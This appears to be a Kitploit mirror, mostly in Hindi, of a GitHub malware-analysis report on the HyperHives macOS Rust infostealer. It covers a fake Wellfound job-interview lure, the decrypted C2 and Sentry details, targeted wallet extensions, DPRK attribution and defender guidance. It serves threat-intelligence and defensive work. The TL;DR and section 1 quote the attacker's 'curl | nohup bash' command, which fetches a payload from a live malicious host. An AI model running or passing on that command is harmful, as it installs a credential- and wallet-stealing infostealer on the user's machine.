Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
hyperhives-macos-infostealer-analysis — पूर्ण स्थैतिक विश्लेषण HyperHives macOS Rust infostealer का — 571 डिक्रिप्टेड कॉन्फ़िग मान, C2 बुनियादी ढांचा, DPRK/Contagious Interview आरोपण, YARA/Sigma नियम, STIX 2.1 बंडल, ATT&CK Navigator परत | Kitploit
उपकरण/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
समझौता संकेतक (IOC) प्रबंधनOSINT (खुला स्रोत खुफिया)रिवर्स इंजीनियरिंगफोरेंसिकमालवेयर विश्लेषणखतरा खुफियापेपर और शोधलर्निंग और शिक्षाचयनित संसाधन

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

पूर्ण स्थैतिक विश्लेषण HyperHives macOS Rust infostealer का — 571 डिक्रिप्टेड कॉन्फ़िग मान, C2 बुनियादी ढांचा, DPRK/Contagious Interview आरोपण, YARA/Sigma नियम, STIX 2.1 बंडल, ATT&CK Navigator परत

रिपॉजिटरी देखेंवेबसाइट
31435 महीने पहलेKitploit द्वारा समीक्षित
साझा करें

HyperHives macOS Infostealer — पूर्ण तकनीकी विश्लेषण

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

खतरा बुद्धिमत्ता: Rust-आधारित macOS यूनिवर्सल बाइनरी इन्फोस्टीलर जो Wellfound (पूर्व में AngelList) पर नकली नौकरी साक्षात्कार पाइपलाइन के माध्यम से वितरित किया गया। "HyperHive" से ऑपरेटर व्यक्तित्व "Felix" ने लक्ष्यों को macos.hyperhives.net से एक दुर्भावनापूर्ण इंस्टॉलर चलाने के लिए लालच दिया। यह रिपॉजिटरी पूर्ण स्थैतिक विश्लेषण दस्तावेज़ित करती है: 571 एन्क्रिप्टेड कॉन्फ़िगरेशन मान पुनर्प्राप्त किए गए, जिनमें C2 URL, एक Sentry DSN, और 276 लक्षित Chrome एक्सटेंशन आईडी शामिल हैं।

नमूना SHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
C2 डोमेनcloudproxy.link
वितरण डोमेनmacos.hyperhives.net
लालच मंचWellfound (पूर्व में AngelList)
ऑपरेटर व्यक्तित्व"HyperHive" पर "Felix"
वायरसटोटल9 / 63 डिटेक्शन
वर्गीकरणसार्वजनिक प्रकटीकरण / IOC बंडल
अंतिम अद्यतनअप्रैल 2026

सामग्री

  • खतरा-बुद्धिमत्ता बंडल
  • रिपॉजिटरी लेआउट
  • त्वरित प्रारंभ
  • TL;DR
  • 1 — यह कैसे शुरू हुआ
  • 2 — बाइनरी
  • 3 — यह क्या चुराता है
  • 4 — डिक्रिप्टेड C2 बुनियादी ढांचा
  • 5 — एट्रिब्यूशन
  • 6 — क्रिप्टैनालिसिस
  • 7 — MITRE ATT&CK मैपिंग
  • 8 — वॉलेट और एक्सटेंशन-आईडी संदर्भ
  • 9 — अनुशंसित कार्रवाइयाँ
  • 10 — पद्धति
  • परिशिष्ट A — सभी 276 Chrome एक्सटेंशन आईडी
  • दायरा और सीमाएँ
  • रिलीज़ इतिहास
  • योगदान
  • लाइसेंस

खतरा-बुद्धिमत्ता बंडल


रिपॉजिटरी लेआउट```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

root@kitploit:~
---

## त्वरित आरंभ

नमूने को `sample/installer_binary` के रूप में रखें (हैश सत्यापन के लिए [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) देखें), फिर:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

The compose file enforces network_mode: none, read_only: true, and drops all Linux capabilities. See SECURITY.md for full handling guidelines.


TL;DR

A job posting on Wellfound (formerly AngelList) led to a multi-email social-engineering chain from an operator persona "Felix" at "HyperHive". After flattering the target's technical background and scheduling a fake interview, the attacker directed the victim to "review the product" at hyperhives.net and specifically examine Settings → Diagnostics → Log — a pretext to trigger execution of:``` curl -s https://macos.hyperhives.net/install | nohup bash &

root@kitploit:~
पेलोड एक **8.5 MB का Mach-O यूनिवर्सल बाइनरी** (x86_64 + arm64) है, जिसे Rust में संकलित किया गया है। एक एयर-गैप्ड Docker लैब और **570 अद्वितीय x86_64 हेल्पर रूटीन** के CPU एमुलेशन के साथ स्टैटिक विश्लेषण ने **सभी 571 एन्क्रिप्टेड कॉन्फ़िगरेशन मान** पुनर्प्राप्त किए, जिससे यह उजागर हुआ:

- **C2:** `cloudproxy.link` — चार HTTPS एंडपॉइंट
- **Sentry (एट्रिब्यूशन पिवट):** `ingest.de.sentry.io` पर org/project आईडी के साथ पूर्ण DSN
- **बिल्ड पहचान:** Cargo उपयोगकर्ता `rootr`, कोडनेम `force`, संस्करण `9.12.1`
- **लक्ष्य:** 276 Chrome एक्सटेंशन आईडी (क्रिप्टो वॉलेट, पासवर्ड मैनेजर, कॉर्पोरेट क्रेडेंशियल)

रणनीति **DPRK-लिंक्ड Contagious Interview** अभियानों के अनुरूप है — वैध प्लेटफ़ॉर्म पर नकली नौकरी भर्ती, मल्टी-स्टेप विश्वास निर्माण, `curl | bash` डिलीवरी, Rust macOS स्टीलर, और क्रिप्टो-केंद्रित एक्सफ़िल्ट्रेशन।

---

## 1 — यह कैसे शुरू हुआ

### लालच: Wellfound पर नकली नौकरी साक्षात्कार

हमला **Wellfound (पूर्व में AngelList) पर एक वैध दिखने वाली नौकरी पोस्टिंग** से शुरू हुआ। लक्ष्य द्वारा आवेदन करने के बाद, "Felix" नामक व्यक्तित्व और "HyperHive" कंपनी नाम का उपयोग करने वाले एक ऑपरेटर से निम्नलिखित ईमेल श्रृंखला शुरू हुई:

**ईमेल 1** (4 अप्रैल, 2026) — प्रारंभिक संपर्क। "Felix" ने लक्ष्य के CV और LinkedIn को स्वीकार किया, दावा किया कि उनके "Tech Lead" ने आगे बढ़ने की मंजूरी दे दी है, और विशेष रूप से लक्ष्य के वास्तविक तकनीकी अनुभव का उल्लेख किया। ईमेल में कहा गया कि HyperHive "विभिन्न ऑपरेटिंग सिस्टमों पर Hyperhives का डेस्कटॉप संस्करण बना रहा है" और लक्ष्य को UTC+0 में एक साक्षात्कार निर्धारित करने के लिए आमंत्रित किया।

**ईमेल 2** (5 अप्रैल, 2026) — फ़ॉलो-अप शेड्यूलिंग। एक विशिष्ट साक्षात्कार स्लॉट (8 अप्रैल को 15:00 UTC) प्रस्तावित किया और महत्वपूर्ण पेलोड डिलीवरी निर्देश शामिल किया:

> *"यदि आप कर सकते हैं, तो कृपया **सेटिंग्स → डायग्नोस्टिक्स → लॉग** के अंतर्गत उत्पाद लॉग पर भी एक त्वरित नज़र डालें। हम लॉग और आपके द्वारा देखी गई किसी भी अन्य उत्पाद टिप्पणियों पर कुछ संक्षिप्त टिप्पणियाँ माँग सकते हैं, क्योंकि यह अक्सर इंजीनियरिंग अनुभव और विस्तार पर ध्यान देने का एक अच्छा संकेत देता है।"*

इसने लक्ष्य को `https://hyperhives.net` पर निर्देशित किया, जहाँ डायग्नोस्टिक्स अनुभाग पर नेविगेट करने से ट्रिगर हुआ:```
curl -s https://macos.hyperhives.net/install | nohup bash &

आगे क्या हुआ

कमांड ने 8.5 MB का Mach-O यूनिवर्सल बाइनरी डाउनलोड और निष्पादित किया। AppleScript के माध्यम से एक नकली macOS पासवर्ड डायलॉग दिखाई दिया। पासवर्ड दर्ज नहीं किया गया। प्रक्रियाओं को तुरंत समाप्त कर दिया गया और नमूने को विश्लेषण के लिए संरक्षित किया गया।

सोशल-इंजीनियरिंग ट्रेडक्राफ्ट सारांश


2 — बाइनरी

नमूना उत्पादन-ग्रेड इंजीनियरिंग प्रदर्शित करता है: सिमैंटिक वर्जनिंग, परिचालन विश्वसनीयता के लिए Sentry एकीकरण, और 570 अद्वितीय हेल्पर फ़ंक्शंस के साथ एन्क्रिप्टेड एक बड़ा एम्बेडेड कॉन्फ़िगरेशन।

VirusTotal कवरेज

पूर्ण रिपोर्ट — प्रारंभिक सबमिशन (अप्रैल 2026) के अनुसार 9/63 इंजनों ने पता लगाया। 85% से अधिक इंजन इस नमूने को फ़्लैग करने में विफल रहे।

क्रॉस-रेफरेंसिंग के लिए उल्लेखनीय विक्रेता परिवार के नाम: HashBreaker (Kaspersky), JobStealer (DrWeb), PSW.Agent.BX (ESET), Stealer-BU (Avast/AVG)।

इनके द्वारा पता नहीं लगाया गया: BitDefender, CrowdStrike Falcon, Sophos, Symantec, McAfee, Malwarebytes, TrendMicro, Fortinet, ClamAV, Panda, और 44 अन्य इंजन। यह कम पहचान दर इस अभियान द्वारा उपयोग किए गए Rust + कस्टम अस्पष्टीकरण दृष्टिकोण की परिचालन प्रभावशीलता को रेखांकित करती है।

विक्रेता हस्ताक्षर अपडेट करने पर पहचान अनुपात बदल जाते हैं। वर्तमान परिणामों के लिए VirusTotal रिपोर्ट देखें।


3 — यह क्या चुराता है

ब्राउज़र डेटा (क्रोमियम-आधारित)

चुराए गए डेटा प्रकार: पासवर्ड, क्रेडिट कार्ड, कुकीज़, सत्र टोकन, ऑटोफिल, ब्राउज़िंग इतिहास।

macOS सिस्टम डेटा

  • लॉगिन कीचेन (login.keychain-db) — नकली डायलॉग के माध्यम से काटा गया उपयोगकर्ता पासवर्ड आवश्यक है
  • Apple Notes — AppleScript/osascript के माध्यम से बाहर निकाला गया
  • हार्डवेयर पहचानकर्ता — IOPlatformExpertDevice / IOPlatformUUID, C2 को hardwares के रूप में रिपोर्ट किया गया

मैसेजिंग

  • Telegram Desktop — पूर्ण खाता अधिग्रहण के लिए tdata सत्र सामग्री

क्रिप्टो वॉलेट (188 तार्किक लक्ष्य, 276 एक्सटेंशन आईडी)

MetaMask, Phantom, Trust Wallet, Ronin, Exodus, OKX, Bybit, Bitget, SubWallet, Ledger Live और Trezor Suite सहित ब्राउज़र-एक्सटेंशन वॉलेट का व्यापक लक्ष्यीकरण। पूर्ण मैपिंग सेक्शन 8 और output/full_decrypted_config.json में।

पासवर्ड मैनेजर

चोरी और परिचालन नियंत्रण

सुविधाविवरण
वीएम पहचानC2 JSON में फ़्लैग

डेटा बहिर्गमन

डेटा ~/Documents/temp_data/Application/ के तहत संग्रहीत किया जाता है, ZIP में संपीड़ित किया जाता है, HTTPS पर multipart/form-data के माध्यम से अपलोड किया जाता है। पीड़ित का IP और भौगोलिक स्थान https://freeipapi.com/api/json के माध्यम से हल किया जाता है।


4 — डिक्रिप्टेड C2 बुनियादी ढाँचा

कमांड और नियंत्रण

एंडपॉइंटभूमिका
https://cloudproxy.link/m/openedबीकन / सक्रियण
https://cloudproxy.link/m/metrics

Sentry DSN (ऑपरेटर फ़िंगरप्रिंट)```

https://526eff9f8bb7aafd7117ca5e33a6a183@o4509139651198976.ingest.de.sentry.io/4509422649213008

root@kitploit:~
| घटक | मान |
|-----------|-------|
| **सार्वजनिक कुंजी** | `526eff9f8bb7aafd7117ca5e33a6a183` |
| **संगठन आईडी** | `4509139651198976` |
| **प्रोजेक्ट आईडी** | `4509422649213008` |
| **क्षेत्र** | EU — `ingest.de.sentry.io` |

Sentry के साथ कानूनी प्रक्रिया से इस org/project से जुड़े खाता पंजीकरण विवरण, बिलिंग रिकॉर्ड और एक्सेस मेटाडेटा प्राप्त हो सकते हैं।

### भू-स्थान API

`https://freeipapi.com/api/json` — C2 JSON के लिए पीड़ित का आईपी / देश (`ipAddress`, `countryCode`)।

### C2 एक्सफिल्ट्रेशन प्रोटोकॉल

| फ़ील्ड | भूमिका |
|-------|------|
| `buildName` / `buildVersion` | `force` / `9.12.1` |
| `uid`, `log_id` | पीड़ित / सत्र पहचानकर्ता |
| `ip`, `geo` | भू-स्थान API से |
| `pers_password` | नकली-संवाद पासवर्ड |
| `passwords`, `wallets`, `credits`, `autofills` | चुराई गई सामग्री |
| `is_vm`, `hardwares`, `force_mode` | पर्यावरण / नियंत्रण फ़्लैग |

अपलोड विधि: `multipart/form-data`, `application/zip`, कनेक्शन स्ट्रिंग `UPLD connect`।

---

## 5 — आरोपण

### समझौता संकेतक

| संकेतक | मान | स्रोत |
|-----------|-------|--------|
| लालच मंच | Wellfound (AngelList) | पीड़ित रिपोर्ट |
| संचालक व्यक्तित्व | "Felix" at "HyperHive" | लालच ईमेल |
| लालच वेबसाइट | `hyperhives.net` | लालच ईमेल |
| प्रेषक ईमेल | `[email protected]` | लालच ईमेल |
| वितरण डोमेन | `macos.hyperhives.net` | पेलोड डाउनलोड |
| वितरण आईपी | `81.28.12.12` (Gcore CDN) | DNS रिज़ॉल्यूशन |
| रजिस्ट्रार / ईमेल | Tucows; Spacemail | WHOIS / MX |
| **C2 डोमेन** | **`cloudproxy.link`** | **नमूने से डिक्रिप्ट किया गया** |
| **Sentry DSN** | [धारा 4](#sentry-dsn-operator-fingerprint) देखें | **नमूने से डिक्रिप्ट किया गया** |
| बिल्ड उपयोगकर्ता | `rootr` | एम्बेडेड Cargo पथ |
| नमूना SHA-256 | `5c7385c3...bf8dd3` | फ़ाइल हैश |

### डेवलपर हैंडल: `rootr`

एम्बेडेड पथ `/Users/rootr/.cargo/registry/`। हैंडल पर OSINT — [github.com/rootr](https://github.com/rootr) (विश्लेषण तिथि के अनुसार): सूचीबद्ध कंपनी "RootR", स्थान जिनेवा, खाता निर्मित **2024-06-27**, शून्य सार्वजनिक रिपॉजिटरी। एक डिस्पोजेबल या परिचालन प्रोफ़ाइल के अनुरूप।

### DPRK / Contagious Interview (विश्लेषणात्मक मूल्यांकन)

| TTP | यह नमूना | रिपोर्ट किया गया DPRK-संबंधित पैटर्न |
|-----|-------------|--------------------------------|
| **वैध मंच पर नकली नौकरी भर्ती** | Wellfound (AngelList) पोस्टिंग → "Felix" के साथ ईमेल श्रृंखला | Contagious Interview: LinkedIn, Indeed, Wellfound नकली भर्ती संपर्क |
| **बहु-चरणीय सोशल इंजीनियरिंग** | वास्तविक CV का संदर्भ देते हुए 2+ ईमेल, नकली साक्षात्कार शेड्यूल करना | पेलोड से पहले विश्वास बनाएं; कई DPRK अभियानों में दस्तावेज़ीकृत |
| **उत्पाद समीक्षा / कोड परीक्षण बहाना** | "Settings → Diagnostics → Log चेक करें" | "हमारा प्रोजेक्ट समीक्षा करें" / "यह कोड परीक्षण चलाएं" बहाने |
| `curl \| bash` वितरण | `macos.hyperhives.net` से इंस्टॉल वन-लाइनर | सामान्य macOS सोशल-इंजीनियरिंग वेक्टर |
| Rust Mach-O यूनिवर्सल बाइनरी | rustc 1.87.0, x86_64 + arm64 | RustDoor / RustBucket / समान क्लस्टर |
| नकली पासवर्ड संवाद | AppleScript `osascript` | संबंधित macOS अभियानों में दस्तावेज़ीकृत |
| बड़ा क्रिप्टो वॉलेट लक्ष्य सेट | 276 एक्सटेंशन आईडी, 188 वॉलेट नाम | DPRK राजस्व सृजन के अनुरूप वित्तीय प्रेरणा |

**विश्वास स्तर:** विषयगत और TTP संरेखण के लिए **उच्च**। Wellfound नकली-नौकरी पाइपलाइन, बहु-ईमेल विश्वास श्रृंखला, उत्पाद-समीक्षा बहाना, Rust macOS स्टीलर, और क्रिप्टो-वॉलेट फोकस Contagious Interview प्लेबुक से निकटता से मेल खाते हैं। यह एक विश्लेषणात्मक मूल्यांकन है, न कि सरकारी या कानून-प्रवर्तन आरोपण कथन।

---

## 6 — क्रिप्टैनालिसिस

कॉन्फ़िगरेशन स्ट्रिंग्स एक **कस्टम XOR सिफर** द्वारा संरक्षित हैं: 570 छोटे x86_64 हेल्पर फ़ंक्शन (कोड रेंज `0x10000`–`0x15000`) प्रत्येक `(data_ptr, seed)` से एक अद्वितीय 16-बिट ऑफ़सेट की गणना करते हैं। ऑफ़सेट बाइनरी में इंडेक्स करके 32-बाइट XOR कुंजी उत्पन्न करता है जो संबंधित सिफरटेक्स्ट ब्लॉक पर लागू होती है।

### विफल रहे दृष्टिकोण

| विधि | परिणाम |
|--------|---------|
| नाइव XOR स्वीप | कोई सुसंगत प्लेनटेक्स्ट नहीं |
| AES / PBKDF2 कुंजी अनुमान | कोई कुंजी शेड्यूल नहीं मिला |
| Rust रनटाइम का पूर्ण-बाइनरी यूनिकॉर्न एमुलेशन | नियंत्रण-प्रवाह जटिलता के कारण विचलन |

### सफल दृष्टिकोण

1. **स्कैन** करें RIP-रिलेटिव `LEA` निर्देशों के लिए जो कॉन्फ़िग रीजन (`0x2b8000`–`0x2bc000`) को लक्षित करते हैं।
2. **पार्स** करें पूर्ववर्ती कोड से `(helper_function_address, data_pointer, seed)` निकालने के लिए।
3. **एमुलेट** करें प्रत्येक हेल्पर को अलग-थलग करके [Unicorn Engine](https://www.unicorn-engine.org/) का उपयोग करते हुए (अधिकतम 200 निर्देश)।
4. **XOR-डिक्रिप्ट** करें लक्षित पते पर 32-बाइट ब्लॉक को, गणना किए गए ऑफ़सेट पर कुंजी का उपयोग करके।
5. **विस्तारित** करें मल्टी-ब्लॉक स्ट्रिंग्स (URL, DSN) और OR+XOR मेटाडेटा एंट्री के लिए।

**कवरेज:** 381 XOR ब्लॉक + 190 OR+XOR मेटाडेटा एंट्री = **571 कॉन्फ़िगरेशन मान** 1.1 सेकंड में पुनर्प्राप्त। शून्य अपुनर्प्राप्त एन्क्रिप्टेड एंट्री।

**कार्यान्वयन:** [`scripts/decrypt_all.py`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/scripts/decrypt_all.py)

---

## 7 — MITRE ATT&CK मैपिंग

> [`attack-navigator-layer.json`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/attack-navigator-layer.json) को [ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/) में इंटरैक्टिव दृश्य के लिए आयात करें।

| तकनीक | आईडी | इस नमूने में उपयोग |
|-----------|----|--------------------|
| फ़िशिंग | T1566 | `[email protected]` से सोशल-इंजीनियरिंग ईमेल |
| उपयोगकर्ता निष्पादन: दुर्भावनापूर्ण फ़ाइल | T1204.002 | लालच से `curl \| bash` |
| कमांड और स्क्रिप्टिंग इंटरप्रेटर: AppleScript | T1059.002 | नकली पासवर्ड संवाद, Apple Notes एक्सफिल्ट्रेशन |
| कमांड और स्क्रिप्टिंग इंटरप्रेटर: Unix शेल | T1059.004 | पाइप्ड bash के माध्यम से प्रारंभिक निष्पादन |
| पासवर्ड स्टोर से क्रेडेंशियल्स: कीचेन | T1555.001 | लॉगिन कीचेन निष्कर्षण |
| पासवर्ड स्टोर से क्रेडेंशियल्स: वेब ब्राउज़र से क्रेडेंशियल्स | T1555.003 | Chromium लॉगिन डेटा डिक्रिप्शन |
| वेब सत्र कुकी चुराएं | T1539 | ब्राउज़र कुकी और टोकन चोरी |
| स्थानीय सिस्टम से डेटा | T1005 | वॉलेट, Telegram, नोट्स, ऑटोफिल |
| संग्रहित किया गया डेटा | T1560 | `~/Documents/temp_data/` के अंतर्गत ZIP स्टेजिंग |
| C2 चैनल पर एक्सफिल्ट्रेशन | T1041 | `cloudproxy.link` पर HTTPS POST |
| एप्लिकेशन लेयर प्रोटोकॉल: वेब प्रोटोकॉल | T1071.001 | चार एंडपॉइंट के साथ HTTPS C2 |
| वर्चुअलाइजेशन/सैंडबॉक्स एवेज़न | T1497 | `is_vm` फ़्लैग |
| अस्पष्टीकृत फ़ाइलें या जानकारी | T1027 | 570 XOR हेल्पर फ़ंक्शन |
| इनपुट कैप्चर | T1056 | नकली पासवर्ड संवाद |
| सिस्टम सूचना खोज | T1082 | हार्डवेयर आईडी और OS संस्करण संग्रह |
| सिस्टम नेटवर्क कॉन्फ़िगरेशन खोज | T1016 | `freeipapi.com` भू-स्थान |
| ट्रस्ट नियंत्रणों को कमजोर करें: गेटकीपर बाईपास | T1553.001 | डाउनलोड की गई बाइनरी पर `xattr -c` |

---

## 8 — वॉलेट और एक्सटेंशन-आईडी संदर्भ

188 वॉलेट नाम और **276 अद्वितीय** 32-वर्ण Chrome एक्सटेंशन आईडी पुनर्प्राप्त किए गए। निम्न तालिका उच्च-प्रोफ़ाइल लक्ष्य दिखाती है; पूरी सूची [परिशिष्ट A](#appendix-a--all-276-chrome-extension-ids) और `output/full_decrypted_config.json` में है।

| वॉलेट | एक्सटेंशन आईडी |
|--------|--------------|
| MetaMask | `hnfanknocfeofbddgcijnmhnfnkdnaad` |
| Phantom | `bfnaelmomeimhlpmgjnjophhpkkoljpa` |
| Trust Wallet | `egjidjbpglichdcondbcbdnbeeppgdph` |
| Ronin | `fnjhmkhhmkbjkkabndcnnogagogbneec` |
| Exodus Web3 | `aholpfdialjgjfhomihkjbmgjidlcdno` |
| OKX | `mcohilncbfahbmgdjkbpemcciiolgcge` |
| Bybit | `pdliaogehgdbhbnmkklieghmmjkpigpa` |
| Bitget | `jiidiaalihmmhddjgbnbgdfflelocpak` |
| SubWallet | `onhogfjeacnfoofkfgppdlbmlmnplgbn` |
| Coinbase Wallet | `hnfanknocfeofbddgcijnmhnfnkdnaad` |

**डेस्कटॉप वॉलेट:** Ledger Live और Trezor Suite डेटा निर्देशिकाएं भी लक्षित हैं।

**महत्वपूर्ण:** ये एक्सटेंशन आईडी **वैध ब्राउज़र एक्सटेंशन** की पहचान करती हैं जिनके स्थानीय डेटा को मैलवेयर चोरी के लिए लक्षित करता है। ये **दुर्भावनापूर्ण एक्सटेंशन नहीं** हैं।

---

## 9 — अनुशंसित कार्रवाइयाँ

### संभावित पीड़ितों के लिए

- अज्ञात `curl | bash` वन-लाइनर्स **न चलाएं**
- यदि उजागर हुए हैं तो सभी ब्राउज़र-संग्रहीत क्रेडेंशियल्स, क्रिप्टो वॉलेट कुंजियाँ, और पासवर्ड-मैनेजर मास्टर पासवर्ड बदलें
- डिस्क पर `~/Documents/temp_data/` की जाँच करें
- स्थानीय कानून प्रवर्तन और प्रासंगिक राष्ट्रीय CERT (जैसे, IC3, NCSC) को रिपोर्ट करें

### रक्षकों के लिए

- `macos.hyperhives.net`, `cloudproxy.link`, और `81.28.12.12` को **ब्लॉक** करें (IP ब्लॉक करने से पहले साझा-होस्टिंग प्रभाव सत्यापित करें)
- `cloudproxy.link` पर HTTPS ट्रैफ़िक और दोनों डोमेन के लिए DNS क्वेरी की **खोज** करें
- इस रिपॉजिटरी से YARA और Sigma नियमों को **तैनात** करें (अपने वातावरण के अनुसार समायोजित करें)
- स्थापित Chrome एक्सटेंशन की तुलना 276-आईडी सूची से करें (एक्सटेंशन वैध हैं — मैलवेयर उनका स्थानीय डेटा पढ़ता है)
- `stix/bundle.json` को अपने CTI प्लेटफ़ॉर्म (MISP, OpenCTI, ThreatConnect, आदि) में **आयात** करें

### कानूनी खोज के लिए

| लक्ष्य | क्या अनुरोध करें |
|--------|-----------------|
| Sentry | org `4509139651198976` के लिए खाता और बिलिंग रिकॉर्ड |
| डोमेन रजिस्ट्रार | `cloudproxy.link` और `hyperhives.net` के लिए WHOIS रिकॉर्ड |
| Gcore CDN | `81.28.12.12` के लिए एक्सेस लॉग |
| ईमेल प्रदाता | `[email protected]` के लिए खाता रिकॉर्ड |
| GitHub | `rootr` के लिए खाता मेटाडेटा |

---

## 10 — कार्यप्रणाली

विश्लेषण एक **Docker कंटेनर** में किया गया:
- `network_mode: none` (कोई आउटबाउंड कनेक्टिविटी नहीं)
- `read_only: true` (अपरिवर्तनीय रूट फ़ाइलसिस्टम)
- सभी Linux क्षमताएं हटाई गईं (`cap_drop: ALL`)
- `no-new-privileges` सुरक्षा विकल्प

उपकरण: Python (LIEF, Unicorn Engine, Capstone, r2pipe), Radare2, और कस्टम स्क्रिप्ट। मैलवेयर का कोई गतिशील निष्पादन नहीं किया गया — सभी निष्कर्ष स्थैतिक विश्लेषण और व्यक्तिगत हेल्पर फ़ंक्शन के पृथक CPU एमुलेशन से प्राप्त हुए।

सत्यापित कलाकृतियाँ: [`scripts/decrypt_all.py`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/scripts/decrypt_all.py), [`output/full_decrypted_config.json`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/output/full_decrypted_config.json)।

---

## परिशिष्ट A — सभी 276 Chrome एक्सटेंशन आईडी

मैलवेयर कॉन्फ़िगरेशन इन एक्सटेंशन आईडी को संदर्भित करता है (उपयोगकर्ता प्रोफ़ाइलों के अंतर्गत local-storage / LevelDB पथ)। **ये आईडी डेटा चोरी के लिए लक्षित वैध एक्सटेंशन की पहचान करती हैं, दुर्भावनापूर्ण एक्सटेंशन नहीं।**```
abkahkcbhngaebpcgfmhkoioedceoigp  abogmiocnneedmmepnohnhlijcjpcifd
acmacodkjbdgmoleebolmdjonilkdbch  aeachknmefphepccionboohckonoeemg
aeblfdkhhhdcdjpifhhbdiojplfjncoa  afbcbjpbpfadlkmhmclhkeeodmamcflc
afccgfbnbpgfdokbllhiccepgggofoco  aflkmfhebedbjioipglgcbcmnbpgliof
agoakfejjabomempkjlepdflaleeobhb  ahkpfejaeoepmfopmbhjgjekibmfcfgo
aholpfdialjgjfhomihkjbmgjidlcdno  aiifbnbfobpmeekipheeijimdpnlpgpp
aijcbedoijmgnlmjeegjaglmepbmpkpi  ajofhbfomojicfifgoeeimefklkfdkfn
ajopcimklncnhjednieoejhkffdolemp  akckefnapafjbpphkefbpkpcamkoaoai
akkmagafhjjjjclaejjomkeccmjhdkpa  algblmhagnobbnmakepomicmfljlbehg
amdcajcnofodjpgbbdnnjkffamfnidae  amkmjjmmflddogmhpjloimipbofnfjih
ammjlinfekkoockogfhdkgcohjlbhmff  anokgmphncpekkhclmingpimjmcooifb
aodkkagnadcbobfpggfnjeongemjbjca  aoedbjimepepemdafoodplnknfkmbnle
apgjfbcibghlclbdiipmojppngeilcol  bbjmepflljbbfaehppakknfgdnojoled
bccippoanbhflmokhkbkepmhmndijenh  bcpialkijhffpgnmgjhjmdeabdbbfmbo
bdgmdoedahdcjmpmifafdhnffjinddgc  bfeplaecgkoeckiidkgkmlllfbaeplgm
bflldjbbpcjgooclhpmhdhioebmnnkcm  bfnaelmomeimhlpmgjnjophhpkkoljpa
bgjogpoidejdemgoochpnkmdjpocgkha  bhhhlbepdkbapadjdnnojkbgioiodbic
bhmbcdekobebkhmloafbjfdcphbmpcnm  bidcmgjdfgkagkleecdockomdjlgglbg
bifidjkcdpgfnlbcjpdkdcnbiooooblg  blnieiiffboillknjnepogjhkgnoapac
bmkakpenjmcpfhhjadflneinmhboecjf  bmmhjnaohafphhlecmkkiaaglcebcapn
bodadjcgfgigmmnambomndppidgdjlni  bplepbelihejfpcjoeialhjpamgpnfln
caalbmclnkldkcgcdkfiapoopikbofnl  cgeeodpfagjceefieflmdfphplkenlfk
cihmoadaighcejopammfbmddcmdekcje  ciojocpkclfflombbcfigcijjcbkmhaf
cjelfplplebdjjenllpjcblmjkfcffne  ckklhkaabbmdjkahiaaplikpdddkenic
cmbagcoinhmacpcgmbiniijboejgiahi  cmoakldedjfnjofgbbfenefcagmedlga
cnmbailpgmdagpofalkeoeooefdkjfdl  cnncmdhjacpkmjmkcafchppbnpnhdmon
cnoepnljjcacmnjnopbhjelpmfokpijm  codfcglpplgmmlokgilfkpcjnmkbfiel
cpmkedoipcpimgecpmgpldfpohjplkpp  dbgnhckhnppddckangcjbkjnlddbjkna
dcbjpgbkjoomeenajdabiicabjljlnfp  dfbacijefbcabjnngipfnbhcpoldlkcg
dkdedlpgdmmkkfjabffeganieamfklkm  dlcobpjiigpikoobohmabehhmhfoodbb
dldjpboieedgcmpkchcjcbijingjcgok  dmjmllblpcbmniokccdoaiahcdajdjof
dngmlblcodfobpdpecaadgfbcggfjfnm  dpcklmdombjcplafheapiblogdlgjjlb
